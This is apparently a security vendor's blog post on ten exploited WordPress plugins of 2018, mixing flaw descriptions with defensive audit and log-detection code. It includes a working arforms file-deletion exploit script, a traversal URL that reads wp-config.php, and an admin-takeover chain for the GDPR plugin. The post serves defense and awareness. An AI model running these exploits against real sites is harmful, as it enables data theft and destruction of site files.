Top Exploited WordPress Plugins in 2018

Introduction

This year many new plugins were launched with innovative features such as SEO optimization and a new editing interface, along with others that extend the functionality of WordPress and make our work on it more productive. However, many of these plugins were exploited by hackers this year for malicious purposes such as stealing credit card data or placing spam links on our pages to redirect visitors and inflate click-through rates. We discuss the top exploited WordPress plugins of 2018, what their vulnerabilities were and how they affected our websites.

Top Exploited WordPress Plugins

1) GDPR

Outcome: The vulnerability allows privilege escalation; that is, it lets unauthenticated users execute any of the plugin's actions and update any value in the database.

Issue:

Generally, the plugin performs a few actions that are submitted through WordPress's admin-ajax.php functionality. Some of these make requests to access data and/or delete it. Additional functionality includes changing the plugin's settings from within the WordPress admin dashboard.

Script to Deploy Malicious Payloads

Earlier versions of the WP GDPR Compliance plugin (<= 1.4.2) do not perform a capability check when the internal action save_setting is executed to make configuration changes. A malicious user submitting arbitrary option names and values gets them stored in the options table of the affected site's database.

Attackers can leverage this flaw to set the users_can_register option to 1 and change the default_role of new users to "administrator", then fill out the visitor form at /wp-login.php?action=register to register as a privileged user. They can then revert the changes they made along the way and install a malicious plugin or theme containing a web shell or other malware to further infect the victim site.
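A read-only audit for the after-effects of this chain, written as an added example for this article (not the article's or the plugin's code): the option names users_can_register and default_role are WordPress's own, while the option and user rows are constructed samples standing in for wp_options and wp_users exports.

```python
from datetime import datetime, timedelta

# Roles a self-registered account should never receive.
PRIVILEGED_ROLES = {"administrator", "editor"}

# Constructed stand-ins for rows exported from wp_options and wp_users.
SAMPLE_OPTIONS = {"users_can_register": "1", "default_role": "administrator"}
SAMPLE_USERS = [
    {"login": "owner", "role": "administrator", "registered": "2017-03-01 10:00:00"},
    {"login": "writer", "role": "author", "registered": "2018-05-12 09:30:00"},
    {"login": "newadmin1", "role": "administrator", "registered": "2018-11-09 02:14:55"},
]

WP_TIME = "%Y-%m-%d %H:%M:%S"


def audit_registration(options):
    """Flag the two option values the exploit chain sets (if not yet reverted)."""
    findings = []
    if str(options.get("users_can_register", "0")) == "1":
        findings.append("open registration is enabled (users_can_register=1)")
    role = options.get("default_role", "subscriber")
    if role in PRIVILEGED_ROLES:
        findings.append("new registrations receive the %s role (default_role)" % role)
    return findings


def recent_privileged_users(users, as_of, window_days=30):
    """Privileged accounts created inside the window ending at as_of: a
    self-registered admin stays visible here even after both options are reverted."""
    as_of_dt = datetime.strptime(as_of, WP_TIME)
    cutoff = as_of_dt - timedelta(days=window_days)
    return [u["login"] for u in users
            if u["role"] in PRIVILEGED_ROLES
            and cutoff <= datetime.strptime(u["registered"], WP_TIME) <= as_of_dt]


def audit_site(options, users, as_of):
    """Combine both checks into one report dict."""
    return {"settings": audit_registration(options),
            "recent_privileged": recent_privileged_users(users, as_of)}
```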

Related Article – WordPress GDPR Compliance Plugin Exploit

2) AMP

Issue:

In older versions of the plugin, AJAX hooks are registered that allow functions to be called directly via wp-admin/admin-ajax.php?action=action_name.

The plugin has a vulnerability that allows every registered user to call these AJAX hooks regardless of whether they are authorized to do so, so any user may invoke such functions.

The loophole in the AMP plugin is located in the ampforwp_save_steps_data function, which saves all the settings entered during installation through the plugin's installation wizard. The corresponding AJAX hook is wp_ajax_ampforwp_save_installer.

Vulnerable Code Segment

The wpnonce value is not checked either, so there is no assurance that a privileged user made the request; any visitor can change these settings directly.

Outcome:

Owing to this vulnerability, hackers can perform several malicious acts: they can place unwanted ads or custom HTML in the header and footer, and since the user role is not validated, anyone can plant ads, mining scripts or malware.

Related Article – Code Injection in WordPress AMP plugin

3) Duplicator

Outcome:

Remote Code Execution Vulnerability

Issue:

Duplicator helps migrate a site's files from one system to another. The flaw gets exploited when installer files are left behind after such a migration. In unpatched versions, the installer.php script introduces a remote file injection vulnerability because it fails to sanitize the database configuration data submitted by the user: the values are written directly into the freshly generated wp-config.php file.

Vulnerable code in installer using raw $_POST input

The submitted values then become the replacement strings that are written into the configuration file.

These are the injection points. Supplying the POST parameter action_ajax=3 tells the installer that the security restriction on overwriting an existing wp-config.php file from its web interface has been bypassed.

The payload can be injected into an existing define() call in the config file, such as DB_HOST or DB_USER. Since a single quote can be passed, the attacker can append arbitrary code of their own to the compromised site's wp-config.php file, establish backdoors and carry out further malicious activity.
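The hardened counterpart of that define() writer, as an added example that is not Duplicator's code: a value containing a single quote must stay inside the PHP string literal. The small literal splitter below is an assumption-free check of what a PHP parser would see; the constant allow-list and sample values are constructed.

```python
# Constants the installer is expected to write; anything else is refused.
ALLOWED_CONSTANTS = {"DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST"}


def render_define_unsafe(name, value):
    """The defect: raw interpolation, so a quote in value ends the PHP literal."""
    return "define('%s', '%s');" % (name, value)


def php_single_quote(value):
    """Wrap value as a PHP single-quoted literal; only \\ and ' are special there."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_define_safe(name, value):
    """Hardened writer: allow-listed name, no NUL bytes, properly escaped value."""
    if name not in ALLOWED_CONSTANTS:
        raise ValueError("unexpected constant name: %r" % name)
    if not isinstance(value, str) or "\x00" in value:
        raise ValueError("invalid value for %s" % name)
    return "define(%s, %s);" % (php_single_quote(name), php_single_quote(value))


def php_string_literals(code):
    """Split PHP code into the single-quoted literals a parser would see,
    honouring \\' and \\\\ escapes, to show what actually reached the file."""
    literals, i = [], 0
    while i < len(code):
        if code[i] != "'":
            i += 1
            continue
        j, buf = i + 1, []
        while j < len(code) and code[j] != "'":
            if code[j] == "\\" and j + 1 < len(code) and code[j + 1] in "\\'":
                j += 1  # escaped quote or backslash stays inside the literal
            buf.append(code[j])
            j += 1
        literals.append("".join(buf))
        i = j + 1
    return literals
```

With the unsafe writer a value such as local'host yields three literals, the third being leftover PHP source; the safe writer yields exactly two.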

Related Article – Outdated Duplicator Plugin vulnerable to RCE

4) tagDiv theme

Issue:

A surprising finding: two domains were found added as external scripts on some 2200+ sites, namely dn.eeduelements.com and cdn.allyouwant.online. The main culprits are outdated tagDiv themes and Ultimate Member plugins, into which the attackers add malicious code. That code includes the src.eeduelements.com/get.php address, which fetches a URL containing a redirect script that ultimately leads visitors to the fake sites.

Malicious redirect page

Outcome:

Redirects to spam websites with fake links and captcha images.

Related Article – Tagdiv theme exploited

5) arforms

Issue:

The arforms plugin (versions <= 3.5.1) suffers from an arbitrary file deletion vulnerability. The following proof-of-concept script demonstrates the issue:

#!/usr/bin/python
import requests
import sys

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "close"
}

print "\n"
if len(sys.argv) < 3:
    print "Please enter WP URL as first argument and file address that you want to delete as second one\n" \
          "for example if WP is installed in the root directory of www.example.com and we want to delete index.php\n" \
          "the exploit format should be: python arforms.py www.example.com index.php"
    exit()

# Check that the named file exists before sending the request
r = requests.get(sys.argv[1] + sys.argv[2], headers=headers)
if r.status_code == 404:
    print "The specified file doesn't exist on the host"
    exit()

url = sys.argv[1] + '/wp-admin/admin-ajax.php'
payload = {
    "action": "arf_delete_file",
    "file_name": "../../../../" + sys.argv[2]
}

r = requests.post(url, data=payload, headers=headers)
if r.status_code != 200:
    print "The specified URL is not a wordpress installation or the plugin isn't installed"
else:
    # Request the file again: a non-200 response now means it is gone
    r = requests.get(sys.argv[1] + sys.argv[2], headers=headers)
    if r.status_code != 200:
        print "Operation completed"
    else:
        print "The target isn't vulnerable"

Outcome:

Arbitrary file deletion in versions <= 3.5.1

6) image-intense

Issue:

The Image Intense WordPress plugin lets authors include images in posts and pages using the Divi builder. Its functionality is exposed through shortcodes that Image Intense processes. When such a shortcode is processed, the src attribute is passed to get_image_url_by_size without any sanitization. Using an src value crafted to alter the original query, SQL injection is triggered whenever a user views the post or page. Successful exploitation therefore lets an authenticated attacker with a role that allows creating posts or pages extract records from the database and, depending on the DBMS's permissions, access other databases or the local filesystem.

Outcome:

For versions <= 3.2.5 – Authenticated SQL injection in shortcodes

background-takeover (https://www.exploit-db.com/exploits/44417)

Issue:

The plugin lets an attacker browse files via its download.php file:

http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php

Outcome:

Directory traversal: an attacker can read arbitrary files on the server through the download.php file.

7) gift-voucher

Issue:

The plugin is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. This vulnerability allows an attacker to extract data from the plugin, access or modify data illegally, and exploit other vulnerabilities in the underlying database. WordPress Plugin Gift Vouchers (Gift Cards and Gift Packages) version 1.0.5 is vulnerable; prior versions may also be affected.

Outcome:

The vulnerability allows an attacker to inject SQL commands via the 'template_id' parameter; this class of issue is known as blind SQL injection.

8) buddyboss-media

Issue:

The BuddyBoss Media WordPress plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This can be leveraged to execute arbitrary script code in the browser of an unsuspecting user on the affected site, allowing the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin BuddyBoss Media version 3.2.3 is vulnerable; prior versions may also be affected.

Outcome:

An attacker can execute arbitrary scripts on our website and thereby steal cookie-based authentication details.

9) userpro

Issue:

Unauthenticated cross-site scripting (XSS) in versions 2.13 to 4.9.23: the UserPro plugin for WordPress allows XSS via the shortcode parameter of a userpro_shortcode_template action sent to wp-admin/admin-ajax.php.

XSS Scripting in userpro

Outcome:

Allows unauthenticated attackers to inject scripts into websites.

10) dark-mode

Issue:

Stored XSS lets hackers run scripts in other users' browsers and steal their session data.

Weak Data Parameters xss1 and xss2
Obtaining cookie information of users

Outcome:

Attackers can steal data from cookies, which can hold information from the users' machines.

Protection Against Zero-Day Attacks in WordPress

Developers release a large number of software applications every day, some small, some complex. Many of these releases contain bugs that neither the developers nor the users are aware of, so a patch is not immediately available when the bug is discovered. Such bugs are dangerous because, if an attacker finds one first, it can be exploited to cause significant damage before a patch is released to repair the vulnerability.

This can be mitigated to a large extent by using a proper firewall (as an additional layer of security), applying patches and updates promptly, and running a proper intrusion detection system. Astra provides all of the above along with a thorough security audit as an extra line of defense for your website: our engineers try to find the flaws in your website before the hackers do.
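What an intrusion detection rule set for the request patterns in this article can look like, as an added example written for this page (not Astra's product or any plugin's code): it runs over constructed Apache-style access log lines and flags the admin-ajax.php actions, the Duplicator installer and path traversal discussed above. The AJAX action is only visible here when sent in the query string; POST bodies need application-level logging.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in Apache combined format: addresses, times and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2018:02:14:55 +0000] "POST /wp-admin/admin-ajax.php?action=save_setting HTTP/1.1" 200 12 "-" "python-requests/2.18"
203.0.113.5 - - [10/Nov/2018:02:15:01 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2018:03:02:17 +0000] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3200 "-" "curl/7.58"
198.51.100.9 - - [10/Nov/2018:03:10:44 +0000] "POST /installer.php?action_ajax=3 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Nov/2018:04:00:00 +0000] "GET /wp-content/uploads/2018/11/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# AJAX actions named in the article whose handlers lacked capability checks.
WATCHED_AJAX_ACTIONS = {"save_setting", "ampforwp_save_installer",
                        "arf_delete_file", "userpro_shortcode_template"}


def classify_request(target):
    """Return the rule names a single request target trips (empty if clean)."""
    hits = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    # Decode twice so double-encoded ..%252F is caught as well as ..%2F.
    decoded = unquote(unquote(target))
    if path.endswith("/wp-admin/admin-ajax.php") and query.get("action") in WATCHED_AJAX_ACTIONS:
        hits.append("watched-ajax-action:" + query["action"])
    if path.endswith("/installer.php"):
        hits.append("duplicator-installer-reachable")
        if query.get("action_ajax") == "3":
            hits.append("duplicator-config-overwrite")
    if "../" in decoded or "..\\" in decoded:
        hits.append("path-traversal")
    return hits


def scan_log(text):
    """Return (line number, client address, method, hits) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = classify_request(match.group("target"))
        if hits:
            findings.append((lineno, line.split()[0], match.group("method"), hits))
    return findings
```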

So secure your WordPress website today!


About The Author

Rohan Roy

An IT engineer and a cyber security enthusiast, I research bugs and flaws in Content Management Systems like Drupal and WordPress and discover how to remove them.
